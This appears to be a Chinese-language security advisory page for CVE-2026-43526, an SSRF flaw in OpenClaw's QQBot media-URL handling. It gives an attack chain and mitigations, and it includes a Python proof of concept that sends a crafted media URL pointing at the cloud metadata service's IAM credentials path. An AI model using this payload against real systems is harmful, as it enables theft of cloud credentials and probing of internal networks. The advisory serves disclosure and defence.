CVE-2026-43526 CVSS 8.2 高危

CVE-2026-43526 OpenClaw SSRF漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43526

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.4.12 版本之前的代码中存在一个严重的服务端请求伪造（SSRF）漏洞。该漏洞位于 QQBot 回复媒体 URL 处理模块中。攻击者可以通过构造恶意的媒体 URL，诱导服务器向内部或外部网络发起未经授权的请求。服务器获取到的内容随后会被通过频道重新上传。由于缺乏对目标 URL 的有效验证，攻击者可以利用此漏洞读取内网敏感信息或对特定目标进行端口扫描，造成数据泄露风险。

技术细节

该漏洞源于 OpenClaw 项目的 QQBot 组件在处理用户发送的媒体 URL 时，未对 URL 的目标地址进行严格的校验和过滤。在处理回复逻辑时，应用程序直接从用户输入中获取 URL，并由服务器端发起 HTTP 请求去获取该 URL 指向的资源内容。随后，这些获取到的字节数据会被上传到消息频道中。由于缺少对内网 IP 地址（如 127.0.0.1, 169.254.169.254）或非预期协议的限制，攻击者可以构造特制的 URL（例如指向本地云元数据服务或内部管理后台）。服务器充当代理，请求攻击者指定的资源。这使得攻击者能够绕过网络边界防御，探测内网拓扑结构，读取敏感文件（如云服务凭证、配置文件），并结合“重传”功能将窃取的数据外带出来，构成了典型的 SSRF 攻击场景。

攻击链分析

STEP 1

侦察与准备

攻击者识别出目标使用的是存在漏洞的 OpenClaw 版本 (< 2026.4.12)，并确定其 QQBot 功能已启用。

STEP 2

构造恶意载荷

攻击者构造一个包含恶意 URL 的消息，该 URL 指向内网敏感资源（如云元数据服务）或攻击者控制的外部服务器。

STEP 3

触发漏洞

攻击者通过 QQBot 接口发送包含恶意媒体 URL 的回复请求。

STEP 4

服务端请求伪造

OpenClaw 服务器接收到请求后，未经验证直接向攻击者指定的 URL 发起 HTTP 请求，获取目标资源的内容。

STEP 5

数据回传与利用

服务器获取到的数据（如敏感凭证）被重新上传到频道中，攻击者通过查看频道内容获取敏感信息，实现数据外带。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url, malicious_url):
    """
    Exploit CVE-2026-43526 by sending a malicious media URL to the OpenClaw QQBot.
    """
    # Endpoint assumption based on typical bot APIs
    api_endpoint = f"{target_url}/api/v1/bot/reply"
    
    payload = {
        "content": "Look at this image",
        "media_url": malicious_url  # The SSRF trigger point
    }

    try:
        print(f"[*] Sending SSRF payload to {target_url}...")
        response = requests.post(api_endpoint, json=payload, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] The server should now fetch the malicious_url and re-upload the content.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    TARGET = "http://localhost:8080"
    # Malicious URL pointing to internal metadata or attacker server
    MALICIOUS_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/role" 
    
    exploit_ssrf(TARGET, MALICIOUS_URL)

影响范围

OpenClaw < 2026.4.12

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 QQBot 的媒体 URL 自动回复功能，或在防火墙层面阻断 OpenClaw 服务器对非必要外部及内网地址的访问连接，以降低 SSRF 风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表